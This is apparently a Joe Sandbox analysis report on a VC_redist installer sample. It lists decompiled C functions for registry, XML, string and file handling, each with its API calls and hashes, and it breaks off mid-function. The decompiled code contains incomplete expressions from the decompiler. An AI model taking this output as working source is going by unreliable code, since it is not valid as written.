                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString$Heap$AllocateProcess
                                                                          • String ID: atomutil.cpp
                                                                          • API String ID: 2724874077-4059165915
                                                                          • Opcode ID: ea7f162c0ce3a68d97b51346417578a2333452ed93b173be89d2efee950ee09c
                                                                          • Instruction ID: c5d13d1bf221804162208a8ddd77f4f654218d5ce1e3baa6f7b77ac1fc8e17f2
                                                                          • Opcode Fuzzy Hash: ea7f162c0ce3a68d97b51346417578a2333452ed93b173be89d2efee950ee09c
                                                                          • Instruction Fuzzy Hash: 4251B231E0422AAFEB21DF64D854FAFB7B8AF44715F010564ED09AB211DB31DE04DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E000535A4(intOrPtr _a4, signed char _a8, intOrPtr* _a12) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				char _v16;
                                                                          				intOrPtr _v24;
                                                                          				char _v32;
                                                                          				short _t29;
                                                                          				void* _t31;
                                                                          				intOrPtr* _t48;
                                                                          				intOrPtr* _t55;
                                                                          				intOrPtr* _t56;
                                                                          				void* _t62;
                                                                          
                                                                          				_t55 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				__imp__#8( &_v32);
                                                                          				_t29 = 8;
                                                                          				_v32 = _t29;
                                                                          				__imp__#2(_a4);
                                                                          				_v24 = _t29;
                                                                          				if(_t29 != 0) {
                                                                          					_t31 = E00052F23(0,  &_v8, 0);
                                                                          					_t55 = _v8;
                                                                          					_t62 =  ==  ? 0x80004005 : _t31;
                                                                          					if(_t62 < 0) {
                                                                          						goto L13;
                                                                          					}
                                                                          					if((_a8 & 0x00000001) == 0) {
                                                                          						L5:
                                                                          						_t62 =  *((intOrPtr*)( *_t55 + 0x110))(_t55, 0);
                                                                          						if(_t62 >= 0) {
                                                                          							_t62 =  *((intOrPtr*)( *_t55 + 0x118))(_t55, 0);
                                                                          							if(_t62 >= 0) {
                                                                          								 *((intOrPtr*)( *_t55 + 0xfc))(_t55, 0);
                                                                          								asm("movsd");
                                                                          								asm("movsd");
                                                                          								asm("movsd");
                                                                          								asm("movsd");
                                                                          								_t62 =  ==  ? 0x8007006e :  *((intOrPtr*)( *_t55 + 0xe8))(_t55,  &_v16);
                                                                          								if(_t62 >= 0) {
                                                                          									_t48 = _a12;
                                                                          									if(_t48 != 0) {
                                                                          										 *_t48 = _t55;
                                                                          										_t55 = 0;
                                                                          									}
                                                                          									_t62 = 0;
                                                                          								} else {
                                                                          									_push( &_v12);
                                                                          									_push(_t55);
                                                                          									if( *((intOrPtr*)( *_t55 + 0xf0))() == 0) {
                                                                          										E00052E85( &_v12, _v12);
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						goto L13;
                                                                          					}
                                                                          					_t62 =  *((intOrPtr*)( *_t55 + 0x120))(_t55, 0xffffffff);
                                                                          					if(_t62 < 0) {
                                                                          						goto L13;
                                                                          					}
                                                                          					goto L5;
                                                                          				} else {
                                                                          					_t62 = 0x8007000e;
                                                                          					E000137D3(_t29, "xmlutil.cpp", 0x16a, 0x8007000e);
                                                                          					L13:
                                                                          					__imp__#9( &_v32);
                                                                          					if(_t55 != 0) {
                                                                          						 *((intOrPtr*)( *_t55 + 8))(_t55);
                                                                          					}
                                                                          					_t56 = _v12;
                                                                          					if(_t56 != 0) {
                                                                          						 *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                          					}
                                                                          					return _t62;
                                                                          				}
                                                                          			}















                                                                          APIs
                                                                          • VariantInit.OLEAUT32(000002C0), ref: 000535BE
                                                                          • SysAllocString.OLEAUT32(?), ref: 000535CE
                                                                          • VariantClear.OLEAUT32(?), ref: 000536AF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearInitString
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 2213243845-1270936966
                                                                          • Opcode ID: 9d83ef5c070a589ac7098e1baa87136cac07ca7ce6f4bf0ff4269b6fb362db67
                                                                          • Instruction ID: 4f8c0d38b65dd710870d70ff4a644f3780355287ac71ca76bb1273fb3d33bb96
                                                                          • Opcode Fuzzy Hash: 9d83ef5c070a589ac7098e1baa87136cac07ca7ce6f4bf0ff4269b6fb362db67
                                                                          • Instruction Fuzzy Hash: F7418375900626AFCB119FA5C888EAFBBF8AF45751F0181A8FC05EB311D735DE048BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 88%
                                                                          			E000465D0(int* _a4, char* _a8, int _a12, short _a16, intOrPtr _a20) {
                                                                          				int _v8;
                                                                          				char _v12;
                                                                          				intOrPtr _v20;
                                                                          				char _v24;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				signed int* _t21;
                                                                          				intOrPtr _t23;
                                                                          				intOrPtr* _t26;
                                                                          				intOrPtr* _t28;
                                                                          				intOrPtr* _t31;
                                                                          				char _t32;
                                                                          				int* _t33;
                                                                          				intOrPtr* _t35;
                                                                          				signed int* _t37;
                                                                          				char* _t39;
                                                                          				int _t43;
                                                                          				void* _t46;
                                                                          				int _t47;
                                                                          
                                                                          				_t39 = _a8;
                                                                          				_t47 = _a12;
                                                                          				if(_t39 == 0 && _t47 != 0) {
                                                                          					_t37 = _a4;
                                                                          					if(_t37 != 0) {
                                                                          						 *_t37 =  *_t37 & 0x00000000;
                                                                          					}
                                                                          					return 0;
                                                                          				}
                                                                          				_t21 = _a4;
                                                                          				if(_t21 != 0) {
                                                                          					 *_t21 =  *_t21 | 0xffffffff;
                                                                          				}
                                                                          				if(_t47 <= 0x7fffffff) {
                                                                          					E000419B7(_t39,  &_v24, _t46, _a20);
                                                                          					_t23 = _v20;
                                                                          					if( *((intOrPtr*)(_t23 + 0xa8)) != 0) {
                                                                          						_v8 = 0;
                                                                          						_t43 = WideCharToMultiByte( *(_t23 + 8), 0,  &_a16, 1, _t39, _t47, 0,  &_v8);
                                                                          						if(_t43 == 0) {
                                                                          							if(GetLastError() != 0x7a) {
                                                                          								L14:
                                                                          								_t26 = E00043E36();
                                                                          								_push(0x2a);
                                                                          								_pop(0);
                                                                          								 *_t26 = 0;
                                                                          								L15:
                                                                          								if(_v12 != 0) {
                                                                          									 *(_v24 + 0x350) =  *(_v24 + 0x350) & 0xfffffffd;
                                                                          								}
                                                                          								goto L17;
                                                                          							}
                                                                          							if(_t39 != 0 && _t47 != 0) {
                                                                          								E0003F670(_t47, _t39, 0, _t47);
                                                                          							}
                                                                          							L32:
                                                                          							_t28 = E00043E36();
                                                                          							_push(0x22);
                                                                          							_pop(0);
                                                                          							 *_t28 = 0;
                                                                          							E00043D7A();
                                                                          							goto L15;
                                                                          						}
                                                                          						if(_v8 != 0) {
                                                                          							goto L14;
                                                                          						}
                                                                          						_t31 = _a4;
                                                                          						if(_t31 != 0) {
                                                                          							 *_t31 = _t43;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          					_t32 = _a16;
                                                                          					if(_t32 <= 0xff) {
                                                                          						if(_t39 == 0) {
                                                                          							L22:
                                                                          							_t33 = _a4;
                                                                          							if(_t33 != 0) {
                                                                          								 *_t33 = 1;
                                                                          							}
                                                                          							goto L15;
                                                                          						}
                                                                          						if(_t47 == 0) {
                                                                          							goto L32;
                                                                          						}
                                                                          						 *_t39 = _t32;
                                                                          						goto L22;
                                                                          					}
                                                                          					if(_t39 != 0 && _t47 != 0) {
                                                                          						E0003F670(_t47, _t39, 0, _t47);
                                                                          					}
                                                                          					goto L14;
                                                                          				} else {
                                                                          					_t35 = E00043E36();
                                                                          					_push(0x16);
                                                                          					_pop(0);
                                                                          					 *_t35 = 0;
                                                                          					E00043D7A();
                                                                          					L17:
                                                                          					return 0;
                                                                          				}
                                                                          			}























                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(0005B508,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 000466A3
                                                                          • GetLastError.KERNEL32 ref: 000466BF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                          • String ID: @Met$comres.dll
                                                                          • API String ID: 203985260-77194002
                                                                          • Opcode ID: 5d91e682255937982d4f374dae574d8585f610fdc9d320dbbbefe75b8494b593
                                                                          • Instruction ID: 3a33ade3be8366a057d3f1a5cf30a9febfa2252c632b5a1e6dddec202a72fc24
                                                                          • Opcode Fuzzy Hash: 5d91e682255937982d4f374dae574d8585f610fdc9d320dbbbefe75b8494b593
                                                                          • Instruction Fuzzy Hash: 5331F6B1600215ABDB31AF59D885AAB3BE89F53750F160139F8155B191FB32CD40C7AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 85%
                                                                          			E00050D1C(void* __ecx, void* _a4, int _a8, short** _a12) {
                                                                          				int _v8;
                                                                          				signed short _t22;
                                                                          				void* _t24;
                                                                          				signed short _t27;
                                                                          				short** _t41;
                                                                          				void* _t44;
                                                                          
                                                                          				_t41 = _a12;
                                                                          				_v8 = 0;
                                                                          				if(_t41 == 0 ||  *_t41 == 0) {
                                                                          					L4:
                                                                          					_v8 = 2;
                                                                          					_t44 = E00011EDE(_t41, 2);
                                                                          					if(_t44 >= 0) {
                                                                          						goto L5;
                                                                          					}
                                                                          				} else {
                                                                          					_t44 = E0001275D( *_t41,  &_v8);
                                                                          					if(_t44 >= 0) {
                                                                          						if(_v8 >= 2) {
                                                                          							L5:
                                                                          							_t22 = RegEnumKeyExW(_a4, _a8,  *_t41,  &_v8, 0, 0, 0, 0);
                                                                          							if(_t22 != 0xea) {
                                                                          								if(_t22 != 0x103) {
                                                                          									goto L11;
                                                                          								} else {
                                                                          									_t44 = 0x80070103;
                                                                          								}
                                                                          							} else {
                                                                          								_t27 = RegQueryInfoKeyW(_a4, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0, 0, 0);
                                                                          								if(_t27 == 0) {
                                                                          									_v8 = _v8 + 1;
                                                                          									_t44 = E00011EDE(_t41, _v8 + 1);
                                                                          									if(_t44 >= 0) {
                                                                          										_t22 = RegEnumKeyExW(_a4, _a8,  *_t41,  &_v8, 0, 0, 0, 0);
                                                                          										L11:
                                                                          										if(_t22 == 0) {
                                                                          											( *_t41)[_v8] = 0;
                                                                          										} else {
                                                                          											_t48 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          											_t24 = 0x80004005;
                                                                          											_t44 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          											_push(_t44);
                                                                          											_push(0x133);
                                                                          											goto L8;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_t51 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          									_t24 = 0x80004005;
                                                                          									_t44 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          									_push(_t44);
                                                                          									_push(0x127);
                                                                          									L8:
                                                                          									_push("regutil.cpp");
                                                                          									E000137D3(_t24);
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							goto L4;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t44;
                                                                          			}










                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00038BD8), ref: 00050D77
                                                                          • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00038BD8,00000000), ref: 00050D99
                                                                          • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00038BD8,00000000,00000000,00000000), ref: 00050DF1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$InfoQuery
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 73471667-955085611
                                                                          • Opcode ID: 5eb3dfb7b0607a1ce2ebb56935b185869e8e2c79d7cbc592ccf108714227ca6e
                                                                          • Instruction ID: 9dcc61efd8653f1968d9e9e08af0c34e28b1c66fd49b91069700d282d4ddc40e
                                                                          • Opcode Fuzzy Hash: 5eb3dfb7b0607a1ce2ebb56935b185869e8e2c79d7cbc592ccf108714227ca6e
                                                                          • Instruction Fuzzy Hash: F131AEB6A01129FFEB218A998D81EEFBBECEF04351F214466BD04E7150D735AE14D6A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E000578C5(void* __ebx, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				intOrPtr* _t40;
                                                                          				intOrPtr* _t45;
                                                                          				intOrPtr _t50;
                                                                          				intOrPtr* _t51;
                                                                          				void* _t52;
                                                                          				void* _t53;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_t50 = E000138D4(0x10, 1);
                                                                          				if(_t50 != 0) {
                                                                          					_t45 = _a4;
                                                                          					_t52 =  *((intOrPtr*)( *_t45 + 0x9c))(_t45,  &_v8, __ebx);
                                                                          					if(_t52 != 0) {
                                                                          						_t53 =  ==  ? 0 : _t52;
                                                                          						goto L6;
                                                                          					} else {
                                                                          						_t53 = E000121A5(_t50, _v8, _t25);
                                                                          						if(_t53 >= 0) {
                                                                          							L6:
                                                                          							if(_t53 >= 0) {
                                                                          								_t53 =  *((intOrPtr*)( *_t45 + 0xa4))(_t45,  &_v12);
                                                                          								if(_t53 >= 0) {
                                                                          									_t11 = _t50 + 4; // 0x4
                                                                          									_t53 = E000121A5(_t11, _v12, 0);
                                                                          									if(_t53 >= 0) {
                                                                          										_t53 = E000533C8(_t45,  &_v16);
                                                                          										if(_t53 >= 0) {
                                                                          											_t13 = _t50 + 8; // 0x8
                                                                          											_t53 = E000121A5(_t13, _v16, 0);
                                                                          											if(_t53 >= 0) {
                                                                          												_t40 = _a8;
                                                                          												while( *_t40 != 0) {
                                                                          													_t40 =  *_t40 + 0xc;
                                                                          												}
                                                                          												 *_t40 = _t50;
                                                                          												_t50 = 0;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t53 = 0x8007000e;
                                                                          					E000137D3(_t23, "atomutil.cpp", 0x3ea, 0x8007000e);
                                                                          				}
                                                                          				E00056A33(_t50);
                                                                          				_t51 = __imp__#6;
                                                                          				if(_v8 != 0) {
                                                                          					 *_t51(_v8);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					 *_t51(_v12);
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					 *_t51(_v16);
                                                                          				}
                                                                          				return _t53;
                                                                          			}













                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000579AA
                                                                          • SysFreeString.OLEAUT32(?), ref: 000579B5
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000579C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString$Heap$AllocateProcess
                                                                          • String ID: atomutil.cpp
                                                                          • API String ID: 2724874077-4059165915
                                                                          • Opcode ID: f6e6de035d5683fd7819f05f22223129df7146e627384dd8681de19248a7c3af
                                                                          • Instruction ID: 3f23fb8c9041e7e7fa5fe9898c08c0b335388941178388f405cf3d9b6bb2962a
                                                                          • Opcode Fuzzy Hash: f6e6de035d5683fd7819f05f22223129df7146e627384dd8681de19248a7c3af
                                                                          • Instruction Fuzzy Hash: 9731A572D05229BFDB129BA4DC45EAFB7A8AF04711F0141A4EE08BB111D731DE48ABA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 92%
                                                                          			E0004CE20(intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				char _v12;
                                                                          				short _v1716;
                                                                          				char _v5132;
                                                                          				intOrPtr _v5136;
                                                                          				long _v5140;
                                                                          				void* _v5144;
                                                                          				int _v5148;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t31;
                                                                          				intOrPtr _t38;
                                                                          				signed int* _t41;
                                                                          				int _t45;
                                                                          				int _t54;
                                                                          				void* _t55;
                                                                          				signed short* _t59;
                                                                          				signed int _t65;
                                                                          				signed int _t67;
                                                                          				signed short* _t69;
                                                                          				void* _t70;
                                                                          				intOrPtr* _t72;
                                                                          				void* _t73;
                                                                          				intOrPtr _t74;
                                                                          				signed int _t75;
                                                                          
                                                                          				E00059F00();
                                                                          				_t31 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t31 ^ _t75;
                                                                          				_t54 = 0;
                                                                          				_t72 = _a4;
                                                                          				_t59 = _a12;
                                                                          				_t69 = _t59;
                                                                          				_v5144 =  *((intOrPtr*)( *((intOrPtr*)(0x7b158 + (_a8 >> 6) * 4)) + 0x18 + (_a8 & 0x0000003f) * 0x30));
                                                                          				_t38 = _a16 + _t59;
                                                                          				 *_t72 = 0;
                                                                          				 *((intOrPtr*)(_t72 + 4)) = 0;
                                                                          				_v5136 = _t38;
                                                                          				 *((intOrPtr*)(_t72 + 8)) = 0;
                                                                          				if(_t59 < _t38) {
                                                                          					while(1) {
                                                                          						L1:
                                                                          						_t74 = _v5136;
                                                                          						_t41 =  &_v1716;
                                                                          						while(_t69 < _t74) {
                                                                          							_t65 =  *_t69 & 0x0000ffff;
                                                                          							_t69 =  &(_t69[1]);
                                                                          							if(_t65 == 0xa) {
                                                                          								_t67 = 0xd;
                                                                          								 *_t41 = _t67;
                                                                          								_t41 =  &(_t41[0]);
                                                                          							}
                                                                          							 *_t41 = _t65;
                                                                          							_t41 =  &(_t41[0]);
                                                                          							if(_t41 <  &_v12) {
                                                                          								continue;
                                                                          							}
                                                                          							break;
                                                                          						}
                                                                          						_t45 = WideCharToMultiByte(0xfde9, _t54,  &_v1716, _t41 -  &_v1716 >> 1,  &_v5132, 0xd55, _t54, _t54);
                                                                          						_t72 = _a4;
                                                                          						_v5148 = _t45;
                                                                          						if(_t45 == 0) {
                                                                          							L11:
                                                                          							 *_t72 = GetLastError();
                                                                          						} else {
                                                                          							while(WriteFile(_v5144,  &(( &_v5132)[_t54]), _t45 - _t54,  &_v5140, 0) != 0) {
                                                                          								_t54 = _t54 + _v5140;
                                                                          								_t45 = _v5148;
                                                                          								if(_t54 < _t45) {
                                                                          									continue;
                                                                          								} else {
                                                                          									 *((intOrPtr*)(_t72 + 4)) = _t69 - _a12;
                                                                          									if(_t69 < _v5136) {
                                                                          										_t54 = 0;
                                                                          										goto L1;
                                                                          									}
                                                                          								}
                                                                          								goto L12;
                                                                          							}
                                                                          							goto L11;
                                                                          						}
                                                                          						goto L12;
                                                                          					}
                                                                          				}
                                                                          				L12:
                                                                          				_pop(_t70);
                                                                          				_pop(_t73);
                                                                          				_pop(_t55);
                                                                          				return E0003DE36(_t55, _v8 ^ _t75, _t67, _t70, _t73);
                                                                          			}































                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,0004D17F,?,00000000,?), ref: 0004CED3
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0004D17F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CF01
                                                                          • GetLastError.KERNEL32(?,0004D17F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CF32
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                          • String ID: @Met
                                                                          • API String ID: 2456169464-2381362037
                                                                          • Opcode ID: e79487fe789fbff794dfc095619aa1f0a8f9d9109a6e402006a83cc111be576a
                                                                          • Instruction ID: 3bbaf8cc7fb022142413f0bcf9652347d91a9cd82860eadd006b1804a89572c2
                                                                          • Opcode Fuzzy Hash: e79487fe789fbff794dfc095619aa1f0a8f9d9109a6e402006a83cc111be576a
                                                                          • Instruction Fuzzy Hash: D33181B1A01219AFEB64CF69DC949EAB7B9FF08305F0444BDE90AD7250D730AD84CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 30%
                                                                          			E000388CF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr* _t44;
                                                                          				void* _t47;
                                                                          
                                                                          				_t39 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				if(E00050E3F(_a8, _a12, 0x20019,  &_v8) >= 0) {
                                                                          					if(E00038458(_v8, _a16,  &_v12) < 0 || _v12 == 0) {
                                                                          						_t47 = 0x80070490;
                                                                          					} else {
                                                                          						_t44 = _a20;
                                                                          						_t47 = E000138F6( *(_t44 + 4) + 1, _t39, _t44,  *(_t44 + 4) + 1, 0xf8, 5);
                                                                          						if(_t47 >= 0) {
                                                                          							_t47 = E0003899C(_t39, _a12, _v8, _a4, _v12,  *(_t44 + 4) * 0xf8 +  *_t44);
                                                                          							if(_t47 >= 0) {
                                                                          								 *(_t44 + 4) =  *(_t44 + 4) + 1;
                                                                          							} else {
                                                                          								_push(_a12);
                                                                          								_push("Failed to initialize package from related bundle id: %ls");
                                                                          								goto L2;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to ensure there is space for related bundles.");
                                                                          							_push(_t47);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push(_a12);
                                                                          					_push("Failed to open uninstall key for potential related bundle: %ls");
                                                                          					L2:
                                                                          					_push(_t47);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t47;
                                                                          			}








                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00038C14,00000000,00000000), ref: 0003898C
                                                                          Strings
                                                                          • Failed to ensure there is space for related bundles., xrefs: 0003893F
                                                                          • Failed to open uninstall key for potential related bundle: %ls, xrefs: 000388FB
                                                                          • Failed to initialize package from related bundle id: %ls, xrefs: 00038972
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                          • API String ID: 47109696-1717420724
                                                                          • Opcode ID: e708e397a987b975dcc82af25bde531e0af407eefa74813eb89a6d2febb3d5ed
                                                                          • Instruction ID: 5ed6599892f4f7b9da0f92a572458a101b8e21015bc10b11bab8a83038717417
                                                                          • Opcode Fuzzy Hash: e708e397a987b975dcc82af25bde531e0af407eefa74813eb89a6d2febb3d5ed
                                                                          • Instruction Fuzzy Hash: FB21743294031ABBDB139A94CC06BFEBB6DEF04711F188196F90066151DB719E20E791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 77%
                                                                          			E00013A97(char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                          				void* _t11;
                                                                          				void* _t21;
                                                                          				char* _t24;
                                                                          				char _t26;
                                                                          				void* _t27;
                                                                          				void* _t29;
                                                                          				void* _t30;
                                                                          				char _t31;
                                                                          
                                                                          				_push(_a8);
                                                                          				_t26 = 0;
                                                                          				_push(_a4);
                                                                          				_t11 = 0x10;
                                                                          				_t27 = 0x18;
                                                                          				_t12 =  !=  ? _t27 : _t11;
                                                                          				_t30 = HeapReAlloc(GetProcessHeap(),  !=  ? _t27 : _t11, ??, ??);
                                                                          				if(_t30 != 0) {
                                                                          					L8:
                                                                          					 *_a16 = _t30;
                                                                          					_t31 = _t26;
                                                                          					L9:
                                                                          					if(_t31 != 0) {
                                                                          						E00013999(_t31);
                                                                          					}
                                                                          					L11:
                                                                          					return _t26;
                                                                          				}
